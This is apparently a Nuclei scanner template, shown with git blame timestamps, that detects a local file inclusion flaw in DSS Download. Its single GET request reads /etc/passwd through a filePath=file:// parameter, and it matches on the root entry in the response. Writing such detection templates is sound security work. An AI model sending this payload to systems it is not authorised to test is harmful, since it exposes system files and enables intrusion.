nuclei-templates/http/vulnerabilities/other/dss-download-fileread.yaml

34 lines
719 B
YAML
Raw Normal View History

2022-04-07 10:31:28 +00:00
id: dss-download-fileread
info:
name: DSS Download - Local File Inclusion
2022-04-07 10:31:28 +00:00
author: ritikchaddha
severity: high
description: DSS Download is vulnerable to local file inclusion.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2022-04-07 11:37:42 +00:00
tags: lfi,dss,lfr
metadata:
max-request: 1
2022-04-07 10:31:28 +00:00
http:
2022-04-07 10:31:28 +00:00
- method: GET
path:
- "{{BaseURL}}/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd"
host-redirects: true
2022-04-07 10:31:28 +00:00
max-redirects: 2
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/22